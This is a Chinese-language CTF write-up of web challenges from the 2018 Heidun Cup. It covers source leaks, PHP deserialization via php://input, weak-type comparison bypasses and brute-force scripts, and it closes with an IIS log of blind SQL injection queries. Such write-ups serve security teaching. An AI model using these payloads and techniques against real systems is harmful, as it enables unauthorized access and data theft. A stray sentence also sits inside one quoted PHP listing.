2018黑盾杯Web题解

无论你输入什么都是错的

bp抓包获得源代码发现

1
<form id="form1" name="form1" method="get" action="da.html">

访问da.html

源代码中发现flag

1
<!-- flag{250872eab74e4ae2d11ff2b5b3fcb1a5}!-->

听说很漂亮

bp抓包发现js代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<script type="text/javascript">
document.oncontextmenu=function(){return false};

var a,b,c,d,e,f,g;
a = 6.10;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);

function check(){
if(document.getElementById("txt").value==a){
return true;
}else{
alert("密码错误");
return false;
}
}
</script>

需要GET参数txt值等于a的值

在本地运行测试a的值为98910652

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /web/beautiful/ HTTP/1.1
Host: 192.168.200.200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.1/student/exam-second/seize-flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i8h2rmbg3p18n5mt0ppar8a4d5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

txt=98910652

获得flag:flag{4b5aabaa648c42c53d39935e7ff663b9}

信息泄露加代码审计

访问/.svn存在泄露文件获得源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
error_reporting(0);

$user = $_COOKIE['user'];
$code = $_GET['code']?(int)$_GET['code']:'';
if($user == 'admin' && !empty($code)) {

$hex = (int)$code;

if(($hex ^ 6789) === 0xCDEF) {
require("flag.php");
echo $flag;
exit();
}

}

echo "缺少应有的参数,你没有权限查看本内容";

?>

获得flag条件是$user=admin,$code ^ 6789 = 0xCDEF

写个脚本爆破code

1
2
3
4
for i in range(1000000):
if i ^ 6789 == 0xCDEF:
print(i)
break

运行结果:55146

payload:

1
2
3
4
5
6
7
8
9
10
11
GET /web/codeaudit/?code=55146 HTTP/1.1
Host: 192.168.200.200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.1/student/exam-second/seize-flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i8h2rmbg3p18n5mt0ppar8a4d5;user=admin
Connection: close

flag:flag{a737c5c5b759c3705c8100accf65b5e4}

the user is admin

bugku原题,先通过PHP伪协议读取源代码,然后发现要利⽤反序列化漏洞读取flag⽂件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# index.php
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
POST这个数据包就能看到flag
joomla
echo "hello admin!<br>";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>
1
2
3
4
5
6
7
8
9
10
11
# class.php
<?php
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}

本地测试获得序列化字符串:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php

class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
$p = new Read();
$p->file = 'f1a9.php';
echo serialize($p);
#$p == "O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}"
?>

POST该数据包就能获得flag

1
2
3
4
5
6
7
8
9
10
11
12
POST /web/theuserisadmin/index.php?file=class.php&pass=O:4:"Read":1:
{s:4:"file";s:8:"f1a9.php";}&user=php://input HTTP/1.1
Host: 192.168.200.200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
the user is admin

flag{078d8dd8023d5716a11780adf344dfd2}

最好的语言

源码审计题⽬,考察PHP弱类型⽐较:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
$x1 = $_GET['x1'];
$x1=="1"?die("ha?"):NULL;
switch ($x1)
{
case 0:
case 1:
$a=1;
break;
}
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
is_numeric(@$x2["x21"])?die("ha?"):NULL;
if(@$x2["x21"]){
($x2["x21"]>2017)?$b=1:NULL;
}
if(is_array(@$x2["x22"])){
if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
$p = array_search("XIPU", $x2["x22"]);
$p===false?die("ha?"):NULL;
foreach($x2["x22"] as $key=>$val){
$val==="XIPU"?die("ha?"):NULL;
}
$c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
if (strstr($x3, 'XIPU')) {
if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
$d=1;
}
}
}
if($a && $b && $c && $d){
include "flag.php";
echo $flag;
}
?>

先来看第一个条件:

1
2
3
4
5
6
7
8
9
10
11
12
if (isset($_GET['x1']))
{
$x1 = $_GET['x1'];
$x1=="1"?die("ha?"):NULL;
switch ($x1)
{
case 0:
case 1:
$a=1;
break;
}
}

考察弱类型比较,switch函数处理字符串时也会对字符串进行intval处理

payload:x1=1a

第二个条件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
is_numeric(@$x2["x21"])?die("ha?"):NULL;
if(@$x2["x21"]){
($x2["x21"]>2017)?$b=1:NULL;
}
if(is_array(@$x2["x22"])){
if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
$p = array_search("XIPU", $x2["x22"]);
$p===false?die("ha?"):NULL;
foreach($x2["x22"] as $key=>$val){
$val==="XIPU"?die("ha?"):NULL;
}
$c=1;
}
}

json_decode会对json格式的字符串进行解码,解码后通过(array)转化为数组

数组中必须含有键名x21和x22,其中键名x21对应的键值不能是数字字符串且必须大于2017,根据PHP弱类型比较可以赋值”x21”=>”2017a”

键名x22对应键值必须是一个数组,且数组元素个数要等于2且数组第一个元素也必须是一个数组,然后键值数组的每一个元素都不能等于”XIPU”,但是array_search函数搜索键值数组中是否含有”XIPU”必须返回true,这里需要利用到array_search函数的特点,也是弱类型比较,”XIPU”intval值为0,数组中任一元素为0即可返回true

所以payload:x2={“x21”:”2017a”,”x22”:[[1],0]}

第三个条件:

1
2
3
4
5
6
7
8
$x3 = $_GET['x3'];
if ($x3 != '15562') {
if (strstr($x3, 'XIPU')) {
if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
$d=1;
}
}
}

$x3弱类型比较不等于’15562’,且’XIPU’必须出现在$x3中,且$x3经过md5函数加密后的第八位到第十六位等于’15562’经过md5函数加密后的第八位到第十六位

这里想不出怎么绕过,我就直接写了个脚本破解,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
import requests

url = "http://127.0.0.1/test/test34.php?x3="

for i in range(1000000000):
url = url + str(i) + 'XIPU'
print(url)
r = requests.get(url)
print(r.text + ' i: ' + str(i))
url = "http://127.0.0.1/test/test34.php?x3="
if 'yes' in r.text:
break

本地环境代码如下:

1
2
3
4
5
6
7
8
9
<?php

$x3 = $_GET['x3'];
echo substr(md5($x3),8,16);
if(substr(md5('15562'),8,16) == substr(md5($x3),8,16) ){
echo 'yes';
}

?>

爆破结果为x3=47484XIPU

最终的payload:

1
x1=1a&x2={"x21":"2017a","x22":[[1],0]}&x3=47484XIPU

注入日志分析

存在data.log文件

首先对文件进行url解码后搜索关键字flag,过滤出最后的盲注flag语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
